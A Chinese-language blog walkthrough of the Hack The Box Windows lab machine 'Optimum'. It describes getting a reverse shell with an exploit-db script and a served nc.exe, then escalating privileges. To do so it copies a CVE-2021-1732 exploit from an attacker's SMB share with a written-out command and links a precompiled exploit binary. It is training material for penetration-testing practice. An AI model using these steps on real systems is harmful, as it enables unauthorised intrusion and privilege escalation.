【Hack The Box】windows练习-- Optimum
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月29日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
使用nmap,就不说了1
一眼锁定
用法在这:expdb官网给的
python Exploit.py
在执行的时候我遇到了问题,无论我是用pythin2 还是3,都无法反弹shell,通过阅读其他师傅在此处的行动,我知道了这个脚本需要用到nc,而windows中没有,所以我们要吧kali中的nc.exe搞到。/var/www/html
在py文件的最下面存在!所以我们还要在80端口开一个服务器!
并且让我们多尝试几遍
在我第二次执行py文件的时候,我成功了

systeminfo中的补丁信息搞到下面来
https://i.hacking8.com/tiquan
可以用这个测漏洞
kali开启服务
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
windows执行这个
copy \\10.10.16.3\kali\CVE-2021-1732.exe C:\Users\kostas\Desktop\CVE-2021-1732.exe
ip是你kali的ip
测了一个最新的结果没出来
但是
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
41020可以
这个是看别人找出来的,我得多学习一下如何利用这些分析脚本
